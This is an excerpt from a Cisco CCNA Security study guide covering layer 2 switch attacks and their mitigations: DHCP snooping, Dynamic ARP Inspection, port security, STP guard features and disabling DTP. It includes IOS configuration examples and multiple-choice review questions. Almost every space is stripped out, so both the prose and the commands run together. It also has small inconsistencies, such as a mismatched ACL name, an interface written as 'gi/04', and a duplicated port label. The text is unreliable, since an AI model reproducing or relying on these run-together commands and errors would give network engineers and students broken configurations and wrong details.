SummaryInthischapter,youlearnedaboutSTPattackssuchasrogueswitches.ThechapterdiscussedhowanARPspoofingattackworksandhowitleadstoaman-in-the-middleattack.MACspoofinganditsuseinaccessingtraffictowhichanattackerisnotauthorizedwasalsocovered.YoulearnedhowaCAMoverflowattackworksanditseffectonaswitch.YoulookedatboththevalueandthedangerofusingCDPandLLDP.Finally,youlearnedhowVLANhoppingattacksareperformed.
ExamEssentialsExplainSTPattacks.Describehowanattackercanintroducearogueswitchintothenetwork
andaltertheloop-freeswitchingtopologycreatedbySTP.
DescribeARPspoofingattacks.ExplainhowanARPspoofingattackissetupandwhattheendresultofasuccessfulARPspoofingattackcanbe.
UnderstandMACspoofing.DescribethepurposeofaMACspoofingattackandhowitmightenableanattackertoreceivetraffictowhichsheisnotauthorized.
ExplaintheCAMoverflowattack.ListthestepsthatcancauseaCAMoverflowanddescribethepotentialbenefittoamaliciousindividual.
UnderstandtheissueswithCDPandLLDP.DescribethereasonfordisablingCDPandLLDPandexplainhowtoimplementthis.
DescribeaVLANhoppingattack.ListthewaystoaccomplishaVLANhoppingattackandexplainthepurposeofthisattack.
ExplainDHCPsnooping.DescribeaDHCPspoofingattackandunderstandtheattackstowhichitcanlead.
ReviewQuestions1. WhichofthefollowingistrueofanSTPattack?
A. Itoccurswiththeintroductionofanewswitchinthenetworkthatismorepowerfulthanthecurrentrootbridge.
B. ItoccurswiththeintroductionofanewswitchinthenetworkthatpossessesaninferiorBPDUthanthecurrentrootbridge.
C. ItoccurswiththeintroductionofanewswitchinthenetworkthatpossessesasuperiorBPDUthanthecurrentrootbridge.
D. Itmaycausealltraffictobypassthenewrogueswitch,whichwillbeunderthemanagementoftheattacker.
2. WhichofthefollowingtakesadvantageofthenormalprocessthatdevicesusetolearnanunknownMACaddressthatadevicewithaknownIPaddresspossesses?
A. CAMoverflow
B. ARPpoisoningattack
C. DHCPspoofing
D. STPattack
3. WhichofthefollowingisusedbyanattackertopollutetheARPcacheofhosts?
A. GratuitousARP
B. SuperiorBPDU
C. InferiorBPDU
D. DTP
4. WhichofthefollowingischeckedpriortoahostperforminganARPbroadcast?
A. CAMtable
B. Hostfile
C. ARPcache
D. LMhostsfile
5. Whichofthefollowingoccurswhenanattackerchangeshisphysicaladdresssothathisdeviceappearstobeanotherdevice?
A. DHCPspoofing
B. CAMoverflow
C. MACspoofing
D. Switchspoofing
6. Whichofthefollowingisalsoconsideredaswitchattack?
A. MACspoofing
B. DHCPspoofing
C. RogueDHCP
D. ARPspoofing
7. Thecontentaddressablememorytableisalsoknownaswhichofthefollowing?
A. ARPcache
B. DNSresolvercache
C. MACtable
D. DHCPscope
8. WhichofthefollowingattacksfloodstheswitchwithframesthathaveinvalidsourceMACaddresses?
A. Smurfattack
B. CAMoverflow
C. SYNflood
D. Fraggleattack
9. Whichofthefollowingattackscausesaswitchtobasicallyoperateasahubandnotaswitch?
A. Smurfattack
B. CAMoverflow
C. SYNflood
D. Fraggleattack
10. Whichofthefollowingisstandardsbased?
A. LLDP
B. CDP
C. EIGRP
D. DTP
11. WhichofthefollowingcommandsdisablesCDPonallinterfaceswhenappliedattheglobalconfigurationprompt?
A. cdpdisable
B. nocdpenable
C. nocdprun
D. nocdpreceive
12. WhichofthefollowingcommandsdisablesLLDPreceptiononaninterfacewhenappliedattheinterfaceconfigurationprompt?
A. lldpdisable
B. nolldpenable
C. nolldprun
D. nolldpreceive
13. Whichattack’saimistoreceivetrafficfromaVLANofwhichthehacker’sportisnotamember?
A. CDPreconnaissance
B. VLANhopping
C. DHCPsnooping
D. STPattack
14. WhichofthefollowingisanexampleofaVLANhoppingattack?
A. Switchspoofing
B. Man-in-the-middle
C. LLDPreconnaissance
D. ARPspoofing
15. WhatprotocoldoestheattackerleverageinaswitchspoofingattackusedtoperformVLANhopping?
A. CDP
B. LLDP
C. DTP
D. STP
16. Whichattackisonlyanissueonswitchesthatuse“native”VLANs?
A. Switchspoofing
B. Doubletagging
C. ARPpollution
D. CAMoverflow
17. Whichserviceintroducesavulnerabilitythatwhenleveragedbyamaliciousindividualcanresultinaninabilityofhoststocommunicate(constitutingaDoSattack)andpeer-to-peerattacks?
A. DHCP
B. DNS
C. DTP
D. NAT
18. Whichofthefollowingattackscanleadtoaphishingattack?
A. DHCPspoofing
B. CAMoverflow
C. Doubletagging
D. Switchspoofing
19. Whichattackoccursontrunklinks?
A. Doubletagging
B. ARPpollution
C. CAMoverflow
D. DHCPspoofing
20. Whatprotocolisusedtonegotiatetheformationofatrunklink?
A. CDP
B. NTP
C. DTP
D. VTP
Chapter6PreventingLayer2AttacksCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
4.5Mitigationprocedures
ImplementDHCPsnooping
ImplementDynamicARPInspection
Implementportsecurity
DescribeBPDUguard,rootguard,loopguard
Verifymitigationprocedures
Nowthatyouunderstandsomeofthelayer2attacksthatcanbeaimedatyourswitchinginfrastructure,youarereadytolearnaboutthemitigationsthatareavailabletoaddresseachoftheseattacks.ThischapterwilldiscusshowtopreventSTPattacks,ARPpollution,MACspoofing,andCAMoverflows.ThechapterwillalsodiscussthepreventionofVLANhoppingattacksandrogueDHCPservers.Finally,thechapterwilldiscusshowtoverifytheproperapplicationofthemitigationsdiscussedinthechapter.
Inthischapter,youwilllearnthefollowing:
Mitigationsforcommonlayer2attacks
ConfiguringDHCPSnoopingInChapter5youlearnedthatarogueDHCPservercancreatesignificantsecurityissuesforyourenvironment.WhenarogueDHCPserverissuesanincorrectIPaddress,anincorrectsubnetmask,andincorrectdefaultgatewayinformationtothehost,itcanpreventpropercommunicationsforthosehosts,amountingtoaDoSattack.Moreover,itcanalsoresultintrafficbeingdirectedthroughthisdevicesothatitcapturesalltraffic.Finally,iftherogueDHCPserverissuesanincorrectDNSserveraddress,itcanresultinarogueDNSserverrespondingtoqueriesforsensitivewebsiteIPaddressessuchasbankswithincorrectinformationthat,whenusedbyunsuspectingusers,canleadtothecaptureofusercredentials.
Thereisawaytopreventallofthis,however,byimplementingafeaturecalledDHCP
snooping.ThisfeatureworksbyfilteringtheDHCPmessagessentbytherogueDHCPserversothattheyareneverreceivedbytheunsuspectinghosts.ItalsousesthemessagessenttoandfromthelegitimateDHCPservertobuildabindingdatabasethatmapstheMACaddressesofhoststotheIPaddressestheyreceivedfromthelegitimateDHCPserver.
DHCPsnoopingisimplementedontheswitchesinthenetwork,soitisalayer2solution.Theswitchportsontheswitcharelabeledeithertrustedoruntrusted.TrustedportsarethosethatwillallowaDHCPmessagetotraverse.TheonlyaccessportsontheswitchthatshouldbelabeledastrustedarethoseleadingtolegitimateDHCPservers.
AllinterswitchportsshouldalsobelabeledastrustedsincetheymightbeusedtosendtheDHCPmessagefromthelegitimateservertohostslocatedonaswitchtowhichthelegitimateDHCPserverisnotcommitted.Allotheraccessportsontheswitchesshouldbelabeledasuntrusted(orleftunlabeled,inwhichcasetheywillbeconsidereduntrusted).ThispreventsarogueDHCPserverconnectedtooneoftheseportsfromrespondingtotheDHCPdiscoverpacketssentbythehosts.Asamatteroffact,anyserverresponsepackets(DHCPOFFER,DHCPACK,orDHCPNACK)willbedroppedbytheseinterfaces.
Figure6.1showsanexampleofhowtheseportsshouldbeconfiguredinasamplenetworkcontainingbothalegitimateandrogueDHCPserver.NoticeinthisscenariothatthelegitimateDHCPserverislocatedontheothersideofanetworkoflayer3switches;therefore,allportsleadingfromthelayer2switchestowardthelegitimateDHCPserverarelabeledastrustedsothatanyoftheseportscanbeusedforcommunicationbythelegitimateDHCPserver.Alsonoticethatallaccessportsonthetwolayer2switcheshavebeenleftunlabeled,whichmakesthemuntrusted.ThispreventstherogueDHCPserverfromrespondingtoanyDHCPdiscoverpackets.
FIGURE6.1DHCPsnooping
Fromahighlevel,thestepsthatarerequiredtoimplementDHCPsnoopingareasfollows:
1. EnableDHCPsnoopinggloballyoneachswitch.
2. EnableDHCPsnoopingexplicitlyforeachVLANwithmembersontheswitch.
3. LabelallaccessportsthatconnecttolegitimateDHCPserversastrusted.
4. Leaveallotheraccessportsunlabeled,whichmakesthemuntrusted.
5. Labelanyinterswitchportsastrusted.
AnoptionalstepyoumaywanttotakeistospecifyafileinflashmemorytoholdtheDHCPsnoopingdatabasethatiscreatedby“snooping”onlegitimateDHCPservertraffic.Intheabsenceofdoingthis,thedatabasewillbestoredinRAM.So,ifyouwantthedatabasetopersistthroughaswitchreload,configureafileinflashforthispurpose.
Let’sgoovereachofthesestepsusingFigure6.1asourguide.Firstlet’senableDHCPsnoopinggloballyonthelayer2switches.I’llcallthemSW67andSW68.
SW67(config)#ipdhcpsnooping
SW68(config)#ipdhcpsnooping
Thisisnotindicatedonthediagram,butlet’sassumeyouhavefourVLANs,VLANs2–5,onthetwoswitches.Nowlet’sexplicitlyenableDHCPsnoopingonthoseVLANs.
SW67(config)#ipdhcpsnoopingvlan2-5
SW68(config)#ipdhcpsnoopingvlan2-5
Therearenoaccessportsonthetwolayer2switchesthatcontainlegitimateDHCPservers,soyoucanleavethemallunlabeled,whichwillmakethemuntrustedbydefault.However,youwillneedtomarkallfouroftheinterfacesleadingfromthelayer2switchestothelayer3switchesastrusted.Whilenotlabeledonthediagram,let’sidentifythisasgi0/1andgi0/2onSW67andgi0/3andgi0/4onSW68.
SW67(config)#intgi0/1-2
SW67(config-if-range)#ipdhcpsnoopingtrust
SW68(config)#intgi0/3-4
SW68(config-if-range)#ipdhcpsnoopingtrust
Finally,justtoseehowit’sdone,let’sconfigureafileinflashfortheDHCPsnoopingdatabase.Theniftheswitchesreloadforsomereason,theywillretainthisdatabase.Callthefilemysnooperonbothdevices.
SW67(config)#ipdhcpsnoopingdatabaseflash:/mysnooper
SW68(config)#ipdhcpsnoopingdatabaseflash:/mysnooper
Inthenextsection,I’llshowyouanadditionalusefortheDHCPsnoopingdatabase.Staytuned!
ConfiguringDynamicARPInspectionAsyoulearnedinChapter5,ARPattacksaretargetedattheARPcachethatisusedbyalldevicestostorerecentlyresolvedIPaddresstoMACaddressmappings.ThesemappingsbecomeknowntothehoststhroughtheARPbroadcastprocessandstoredintheARPcacheforashortperiodoftimetoeliminatetheneedtorepeattheARPbroadcastprocessforeverypacketinalargestreamofpackets.Eachtimeanentryinthecacheisused,thetimerthatagesitoutofthecacheisupdated.ARPpollutionattacksusegratuitousARPpacketstoforceincorrectentriesintotheARPcache,withtheaimofsendingtraffictotheattackerthatshouldbesentelsewhere.
TheattackcanbepreventedbyimplementingafeatureontheswitchescalledDynamicARPInspection(DAI).ThisfeaturerequiresthatDHCPsnoopingalsobeenabledbecauseitdependsontheDHCPsnoopingdatabasethatiscreatedwhenDHCPsnoopingisenabled.Whenenabled,itallowstheswitchtointerceptARPpacketsonportsthatyoudesignateasuntrustedandwillverifythateachinterceptedpackethasavalidMACtoIPaddressmappingbeforeupdatingtheARPcacheandforwardingthepacket.ThisvalidationisperformedbyusingtheDHCPsnoopingdatabase.
Whenproperlyconfigured,DAIoperatesasshowninFigure6.2.Anattackersendsa
gratuitousARPmessagetopollutetheARPcacheofthehostat10.1.1.2.Whentheswitchreceivesthismessage,itconsultstheDHCPsnoopingdatabase,andwhendiscoveringthatthepacketcontainsanincorrectMACtoIPaddressmapping,itdropsthepacket.
FIGURE6.2DAIinaction
InthescenarioshowninFigure6.2,theDAIimplementationwouldrequirethattheportsontheswitchconnectedtothehostsbelabeledasuntrusted(forthepurposesofDAI)andallinterswitchportsbelabeledastrusted.BypassingthesecuritycheckbetweenswitchesissafeifDAIisenabledonalloftheswitchesbecausetheswitcheswillonlybesendingpacketstooneanotherthathavealreadybeencheckedwhenreceivedbytheswitch.
IncaseswhereinterfaceswithstaticIPaddressesarepresent(suchasdefaultgatewaysonrouters),additionalstepsarerequiredbecausethoseinterfacesandtheirIPtoMACaddressmappingswillnotbefoundintheDHCPsnoopingdatabasebecausethat’snothowthoseinterfacesgottheirIPaddresses.TheseinterfaceswillrequirethatyoucreateatypeofACLontheswitchcalledanARPACL.ThisACLidentifiesthecorrectIPtoMACaddressmappingfortheinterface,andtheACLisreferencedasafilterintheDAIconfiguration.ThismakestheACLavailabletotheDAIprocessasanadditiontotheDHCPsnoopingdatabase.
ToenableDAI,thehigh-levelstepsareasfollows:
1. EnableDAIforeachVLAN.
2. Specifyinterswitchportsastrusted.
3. Leaveallotherportstothedefaultofuntrusted.
4. ForanyinterfacessuchasdefaultgatewaysthathavestaticIPaddresses,createanARPACLthatmapstheIPaddressoftheinterfacetoitsMACaddressoftheinterface.
5. ReferenceanyARPACLsthathavebeencreatedwhenenablingDAI.
UsingthediagraminFigure6.2,let’sperformeachstep.Firstlet’senableDAIontheswitchforVLAN3.
SW69(config)iparpinspectionvlan3
Whilenotshowninthediagram,let’spretendtheswitchhasanuplinkcalledgi/04,which
connectstoanotherswitch.Youneedtomarkthisinterfaceastrusted,solet’sdoit.
SW69(config)#intgi0/4
SW69(config-if)#iparpinspectiontrust
Allotherportsneedtobelabeleduntrusted,whichisthedefault,soyoucanleavethemastheyare.SincethedefaultgatewayontherouterhasastaticIPaddressof10.1.1.1,youneedtocreateanARPACLthatcreatestheIPtoMACaddressmapping.Let’sdothisandusetheMACaddressaaaa.bbbb.cccc.ItsnamewillbeStatic-IP-VLAN3.NoticethatthisisaninstancewhereanACLisusednottoalloworblocktrafficbuttoidentifyanitem(inthiscasetheIPtoMACaddressmapping)forspecialtreatment.
SW69(config)#arpaccess-listStaticIP-VLAN3
SW69(config-arp-acl)#permitiphost10.1.1.1machostaaaa.bbbb.cccc
ThelastitemyouneedtotakecareofistoreferencethenameoftheARPACLintheDAIconfiguration.Whenyoudothis,youalsohavetoreferencetheVLANtowhichitapplies.
SW69(config)#iparpinspectionfilterStaticIP-VLAN3vlan3
WhileyouusedtheVLANnumberinthenameoftheACL,thatisnotwhattiesittoVLAN.ItistheexplicitreferencetoVLAN3attheendofthecommandthatdoesit.
ConfiguringPortSecurityInChapter5youlearnedhowamaliciousindividualcoulduseaCAMoverflowattacktofilltheCAMtableoftheswitch,resultingintheswitchfloodingalltrafficoutallports.Thisbasicallyturnstheswitchintoahubandtherebyallowstheattackertoreceivealltraffic,regardlessoftheVLANtowhichtheframebelongs.However,youcanpreventthisbyusingafeaturecalledportsecurity.Thisfeaturecancontrolthefollowing:
ThemaximumnumberofMACaddressesthatcanbeseenonaport(whichwillsolvetheCAMoverflowissue)
ExactlywhichMACaddressescantransmitonaport(preventingunauthorizedaccesstothenetwork)
Let’slookathowyoumightpreventaCAMoverflowattackbylimitingthenumberofMACaddressesthatcanbeseenonaninterface.Fromahighlevel,thesearethestepsrequired.Thecommandswillfollowlater.
1. Specifytheportasanaccessport(ifnotalreadydone).
2. Enableportsecurityontheport.
3. SpecifythemaximumnumberofMACaddressesallowedontheport.
4. Specifytheactiontobetakenwhenaviolationoccurs.
Let’sconfigurethesestepsonaCiscoswitch.Firstspecifytheportgi0/2asanaccessport.
SW70(config)#intgi0/2
SW70(config-if)#switchportmodeaccess
Thenextstepistoenableportsecurityontheinterface.Thatisdonewiththefollowingcommand:
SW70(config-if)#switchportport-security
TospecifythemaximumnumberofMACaddressesthatcanbeseenontheport,usethefollowingcommand.Inthiscase,youareallowingtwobecausetheuserhasbothaPCandanIPphoneconnectedtothesameport.
SW70(config-if)#switchportport-securitymaximum2
Finally,let’sspecifythatifaviolationoccurs,theportwillbeshutdown.Youcanalsochoosethefollowingactionsusingalternativekeywordstotheshutdownkeyword:
protect:Theoffendingframewillbedropped.
restrict:TheframeisdroppedandanSNMPtrapandasyslogmessagearegenerated.
SW70(config-if)#switchportport-securityviolationshutdown
Withthisconfigurationinplace,theportwillbeprotectedbyaCAMoverflowattack.Ifoneoccurs,theportwillbeshutdown.
PortsecuritycanalsobeusedtospecifytheexactMACaddressesthatareallowedontheport.Thiswillpreventanunauthorizeddevicefromusingtheport.YoucanspecifytheMACaddress(oraddresses)manually,oryoucanuseacoolcommandoptioncalledmac-addressstickythattellstheporttolearntheMACaddressesofthedevicescurrentlyconnectedtotheportandmakethoseMACaddressestheonlyonesallowedontheport.Assumingyouhavespecifiedtheportasanaccessportandenabledportsecurityontheport,thisiseasilydonewiththissinglecommand:
SW70(config-if)#switchportport-securitymac-addresssticky
Withtheportconfiguredlikethis,theportisprotectedbothfromunauthorizeddevicesandfromCAMoverflowattacks.
ConfiguringSTPSecurityFeaturesInChapter5youwereintroducedtoanattackaimedattheSpanningTreeProtocol(STP).WhenamaliciousindividualintroducesarogueswitchtotheswitchingnetworkandtherogueswitchhasasuperiorBPDUcomparedtotheoneheldbythecurrentrootbridge,thenewswitchassumesthepositionofrootbridge.
Sincethetopologyoftheswitchingnetworkdependsonthepositionoftherootbridgeandtherelativepositionoftheotherswitchestotherootbridge,thisaltersthetopologyinwaysthatnotonlymayimpactperformancebutmaycausealltraffictotraversethenewrogueswitch,
whichwillbeunderthemanagementoftheattacker.Topreventthisfromoccurring,youcanmakeuseofthreefeatures:BPDUGuard,RootGuard,andLoopGuard.Let’slookatallthreefeatures.
BPDUGuardTheBPDUGuardfeatureisdesignedtopreventthereceptionofsuperiorBPDUsonaccessportsbypreventingthereceptionofanyBPDUframesontheaccessport.Itshouldbeimplementedonlyonaccessports,becauseifimplementedontrunks,itwouldinterferewiththenormaloperationofSTP,whichdependsontheseframesforitsoperation.However,itshouldbeimplementedonallaccessports.Whenimplemented,ithastheeffectshowninFigure6.3.ByblockingthesuperiorBPDUsentbytheattacker,theSTPtopologyremainsunchanged.
FIGURE6.3BPDUGuardinaction
TheimplementationofBPDUGuardcanbedoneattheinterfaceleveloritcanbedoneglobally,whichwillimplementthefeatureonallaccessportsontheswitch.Let’simplementitfirstattheinterfacelevel.Thisisdonewiththefollowingcommand:
SW71(config)#intgi0/5
SW71(config-if)#spanning-treebpduguardenable
Toenablethisfeatureonallaccessports,executethefollowingcommandattheglobalconfigurationprompt.YoumustensurebeforeyourunthiscommandthatallaccessportsareconfiguredwithPortFast.ThisfeatureallowsaccessportstoimmediatelyproceedtotheforwardingstatewithoutgoingthroughtheinterimportstatesofSTPaswouldbedoneonatrunkport.
ThefollowingcommandwillenablebothPortFastandBPDUGuardonallaccessports:
SW71(config)#spanning-treeportfastbpduguarddefault
Whenaviolationoccurs,theportwillbeplacedinanerr-disabledstateandwillnotpasstrafficuntilitisenabledagainmanually.
RootGuardAnotherfeaturethatisdesignedtopreventachangeintherootbridgeisRootGuard.Thisfeatureisalsoimplementedonaccessports.Itisimplementedonallportsoftherootbridge.ItpreventsthereceptionofsuperiorBPDUsonly,notallBPDUs.Moreover,whenaviolationoccurs,theportisnoterr-disabledasinthecasewithBPDUGuard.Rather,itisplacedinaninconsistentstateandwillrecoverandreturntoanormalstatewhenthereceptionofsuperiorBPDUsceases.Thisfeatureisimplementedonlyattheinterfacelevel,asshownhere:
SW71(config)#intgi0/5
SW71(config-if)#spanning-treeguardroot
LoopGuardAnSTPloopcanbecreatedwhenablockingportinaredundanttopologyerroneouslytransitionstotheforwardingstate.ThisusuallyhappensbecauseoneoftheportsnolongerreceivesSTPBPDUs.Initsoperation,STPreliesoncontinuousreceptionortransmissionofBPDUsbasedontheportrole.TheSTPLoopGuardfeatureprovidesadditionalprotectionagainstlayer2forwardingloops(STPloops).
TopreventthisanomalyfromalteringtheSTPtopology,usetheLoopGuardfeature.ThisfeaturemakesadditionalchecksifBPDUsarenotreceivedonanondesignatedport.WithLoopGuardenabled,thatportmovesintotheSTPloop-inconsistentblockingstate,insteadofthelistening/learning/forwardingstate.WithouttheLoopGuardfeature,theportassumesthedesignatedportrole,movestotheSTPforwardingstate,andcreatesaloop.
ToenableLoopGuard,usethefollowingcommand:
SW77(config)#interfacegigabitEthernet1/1
SW77(config-if)#spanning-treeguardloop
DisablingDTPInChapter5youlearnedthatarogueswitchaddedtoyournetworkbyamaliciousindividualcanalteryourSTPtopologyandmayevencausetherogueswitchtobecometherootbridge.IfDynamicTrunkingProtocol(DTP)isenabledonyourswitchinterfacesandiftheinterfaceissettoeitherdynamicdesirableordynamicauto,itispossibleforarogueswitchconnectedtosuchaconfiguredinterfacetobecomepartoftheSTPtopology.Bysettingtheportstateoftherogueswitchtodynamicdesirable,atrunklinkwillautomaticallybeformed.
Topreventthis,disableDTPonallswitchinterfaces.Settheportstatesofallinterfacesto
eithertrunkoraccessasrequiredbysettingtheirportstatestotrunkoraccess.TodisableDTPonallports,usethefollowingcommand:
SW71(config)#intfa0/1-24
SW71(config-if)#switchportnonegotiate
VerifyingMitigationsWhenusingtheconfigurationscoveredinthischapter,itisalwaysagoodideatoverifythesuccessfulapplicationofeach.Itisalsohelpfultoknowhowtocheckfortheseconfigurationswhenyouareunfamiliarwithaspecificswitch.Thissectionwillcovertheseverifications.
DHCPSnoopingToverifytheconfigurationofDHCPsnooping,usetheshowipdhcpsnoopingcommand,asshownhere.Theoutputistruncatedtoshowthecriticalparts.
SW72#shipdhcpsnooping
SwitchDHCPsnoopingisenabled
DHCPsnoopingisconfiguredonfollowingVLANs:
1-200
Insertionofoption82isenabled
InterfaceTrustedRatelimit(pps)
——————————–—————–
FastEthernet0/1yesunlimited
SW72#
Notethefollowing:
DHCPsnoopingisgloballyenabled.
ItisoperationalonVLANs1–200.
FastEthernet0/1isthetrustedinterface.
DAIToverifytheconfigurationofDAI,usetheshowiparpinspectioncommand,asshownhere:
Switch73#showiparpinspection
SourceMacValidation:Disabled
DestinationMacValidation:Disabled
IPAddressValidation:Disabled
VlanConfigurationOperationACLMatchStaticACL
–––––––––––––––––––––––––––––––––––––––––––––
10EnabledActive
VlanACLLoggingDHCPLoggingProbeLogging
––––––––––––––––––––––––––––––––––––––––
10DenyDenyOff
VlanForwardedDroppedDHCPDropsACLDrops
–––––––––––––––––––––––––––––––––––––––
10010100
VlanDHCPPermitsACLPermitsProbePermitsSourceMACFailures
–––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
100000
VlanDestMACFailuresIPValidationFailuresInvalidProtocolData
––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
10000
Notethefollowing:
ItisenabledforVLAN10.
TenpacketshavebeendroppedbyDAI.
PortSecurityToverifytheconfigurationofportsecurity,usetheshowportsecuritycommand,asshownhere:
SW74#showport-security
SecurePortMaxSecureAddrCurrentAddrSecurityViolationSecurity
Action
(Count)(Count)(Count)
––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
Fa5/111110Shutdown
Fa5/51550Restrict
Fa5/11540Protect
––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
TotalAddressesinSystem:21
MaxAddresseslimitinSystem:128
Notethefollowing:
PortssecurityisenabledontheFa5/1,Fa5/5,andFa5/11interfaces.
Therehavebeennoviolationsthusfar.
Ifaviolationoccurs,thefa5/1interfacewillnotforwardtheoffendingtraffic,willshutdown,willsendanSNMPtrapandsyslogmessage,andwillincrementtheviolationcounter.
Ifaviolationoccurs,thefa5/5interfacewillnotforwardtheoffendingtraffic,willsendan
SNMPtrapandsyslogmessage,andwillincrementtheviolationcounter,butitwillstillpasslegitimatetraffic.
Ifaviolationoccurs,thefa5/5interfacewillnotforwardtheoffendingtraffic,willnotsendanSNMPtraporsyslogmessage,andwillnotincrementtheviolationcounter,butitwillstillpasslegitimatetraffic.
STPFeaturesInthissection,you’lllearnhowtoverifytheproperapplicationofBPDUGuard,RootGuard,LoopGuard,andDTP.
BPDUGuardToverifythatBPDUGuardhasbeenconfiguredcorrectly,executetheshowspanning-treesummarytotalscommand.NotethatPortFastBPDUGuardisenabledgloballyonthisswitch.
SW75#showspanning-treesummarytotals
Rootbridgefor:none.PortFastBPDUGuardisenabled
UplinkFastisdisabled
BackboneFastisdisabled
Spanningtreedefaultpathcostmethodusedisshort
NameBlockingListeningLearningForwardingSTPActive
–––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
1VLAN00011
RootGuardToverifythatRootGuardhasbeenconfiguredcorrectly,executetheshowspanning-treeinterface<intid>detailcommand.NotethatRootGuardisenabledonthisport.
SW76#showspanning-treeintfa0/22detail
Port24(FastEthernet0/22)ofVLAN0001isbroken(RootInconsistent)
Portpathcost19,Portpriority128,PortIdentifier128.24.
Designatedroothaspriority4097,address000d.bc51.6d00
Designatedbridgehaspriority24577,address0018.1820.2700
Designatedportidis128.24,designatedpathcost57
Timers:messageage3,forwarddelay0,hold0
Numberoftransitionstoforwardingstate:2
Linktypeispoint-to-pointbydefault
Rootguardisenabledontheport
BPDU:sent502,received1701
LoopGuardToverifythatLoopGuardhasbeenconfiguredcorrectly,executetheshowspanning-tree
summarycommand.NotethatLoopGuardisenabled.
Router#showspanning-treesummary
Switchisinpvstmode
Rootbridgefor:none
EtherChannelmisconfigguardisenabled
ExtendedsystemIDisdisabled
PortfastDefaultisdisabled
PortFastBPDUGuardDefaultisdisabled
PortfastBPDUFilterDefaultisdisabledLoopguardDefaultis
enabled
UplinkFastisdisabled
BackboneFastisdisabled
Pathcostmethodusedisshort
NameBlockingListeningLearningForwardingSTPActive
–––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
Total00000
DTPToverifythatDynamicTrunkingProtocolhasbeenproperlydisabled,executetheshowinterfacesswitchportcommand,asshownhere:
SW1#showinterfacesfastEthernet0/24switchport
Name:Fa0/24
Switchport:Enabled
AdministrativeMode:staticaccess
OperationalMode:staticaccess
AdministrativeTrunkingEncapsulation:negotiate
OperationalTrunkingEncapsulation:nativeNegotiationofTrunking:Off
Notethefollowing:
DTPnegotiationisdisabled(seethelastline).
Thisisanaccessport.
SummaryInthischapter,youlearnedtoconfigureDHCPsnoopingtopreventtheintroductionofrogueDHCPservers.Thechapteralsodiscussedhow,whencombinedwithDHCPsnooping,DAIcanpreventARPpoisoningattacks.YoulearnedhowtopreventMACoverflowattacksandlearnedabouthowunauthorizeddevicescanswitchportsbyusingportsecurity.Finally,thechapterdiscussedBPDUGuard,RootGuard,andLoopGuard,allSTPfeaturesdesignedtopreventchangestotheSTPtopology.
ExamEssentials
ImplementDHCPsnooping.ConfigureandverifyDHCPsnoopingtopreventtheissuescausedbyarogueDHCPserverandtosupporttheapplicationofDynamicARPInspection.
DeployDAI.ImplementDynamicARPInspectiontopreventARPpollution,whichcanleadtoaman-in-the-middleattack.
Configureportsecurity.PreventMACoverflowattacksandtheintroductionofunauthorizeddevicestoswitchportsbysecuringtheportusingtheportsecurityfeature.
DescribethebenefitsofSTPsecurityfeatures.ThesefeaturesincludeBPDUGuard,RootGuard,andLoopGuard.
ReviewQuestions1. WhichofthefollowingistrueofDHCPsnooping?
A. Itpreventstheintroductionofrogueswitches.
B. Itisimplementedonrouters.
C. ItbuildsabindingdatabasethatmapstheMACaddressesofhoststotheIPaddressestheyreceivedfromthelegitimateDHCPserver.
D. Whenimplementingit,allportsshouldbeuntrusted.
2. WhichDHCPpackettypesaredroppedonuntrustedinterfacesprotectedbyDHCPsnooping?
A. DHCPACK
B. DHCPOFFER
C. DHCPNACK
D. Alloftheabove
3. WhichofthefollowingfeaturesmustbeconfiguredfortheoperationofDAI?
A. LoopGuard
B. DHCPsnooping
C. RootGuard
D. BPDUGuard
4. WhatisrequiredtoenableDAIonaninterfacewithastaticIPaddress?
A. AnACL
B. LoopGuard
C. PortFast
D. RootGuard
5. Whichofthefollowingcommandscausestheswitchtodroptheoffendingtrafficwhenaviolationoccursbutneithershutsdowntheinterfacenorsendssyslogmessages?
A. switchportport-securityviolationshutdown
B. switchportport-securityviolationrestrict
C. switchportport-securityviolationdeny
D. switchportport-securityviolationprotect
6. Whichattackdoestheswitchportport-securitymaximum2commandprevent?
A. MACspoofing
B. CAMoverflow
C. RogueDHCP
D. ARPspoofing
7. Whichofthefollowingshouldbeimplementedonlyonaccessports?
A. BPDUGuard
B. RootGuard
C. LoopGuard
D. DTP
8. WhichtypeoftrafficispreventedonportswhereRootGuardisenabled?
A. Alltraffic
B. AllBPDUs
C. SuperiorBPDUs
D. InferiorBPDUs
9. WhatstatedoesaportconfiguredwithLoopGuardenterwhenthereceptionofBPDUsstops?
A. Shutdown
B. Loop-inconsistent
C. Err-disabled
D. Blocking
10. Whichfeatureisdisabledwiththecommandswitchportnonegotiate?
A. STP
B. DTP
C. VTP
D. CDP
11. Inthefollowingconfiguration,whichportwillnotforwardtheoffendingtraffic,willnotsendanSNMPtraporsyslogmessage,andwillnotincrementtheviolationcounterbutwillstillpasslegitimatetraffic?
SW74#showport–security
SecurePortMaxSecureAddrCurrentAddrSecurityViolationSecurityAction
(Count)(Count)(Count)
Fa5/111110Shutdown
Fa5/51550Restrict
Fa5/11540Protect
Fa5/12320Shutdown
––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––
TotalAddressesinSystem:21
MaxAddresseslimitinSystem:128
A. Fa5/1
B. Fa5/5
C. Fa5/11
D. Fa5/12
12. Whichofthefollowingfeaturespreventstheintroductionofarogueswitch?
A. BPDUGuard
B. DAI
C. DHCPsnooping
D. LoopGuard
13. WhichcommandshouldbeconfiguredonaportwherethelegitimateDHCPserverresides?
A. ipdhcpsnoopingtrust
B. ipdhcpsnoopingenable
C. ipdhcpsnooping
D. ipdhcpsnoopinguntrust
14. Whatisthepurposeofthecommandipdhcpsnoopingdatabaseflash:/mysnooper?
A. Theswitchwillretainthedatabasethroughareboot.
B. Theswitchwillsharethedatabasewithdirectlyconnectedswitches.
C. TheswitchwillapplythedatabasetoallVLANs.
D. Theswitchwilldeletethefileduringareboot.
15. WhatisthedefaultstateofaportwithrespecttoDAI?
A. Trusted
B. Untrusted
C. Null
D. Nonegotiate
16. Inthefollowingcommand,whatisthenameoftheACL?SW69(config)#iparpinspectionfilterStaticIP-VLAN3vlan3
A. vlan3
B. 3
C. StaticIP-VLAN3
D. filterStaticIP
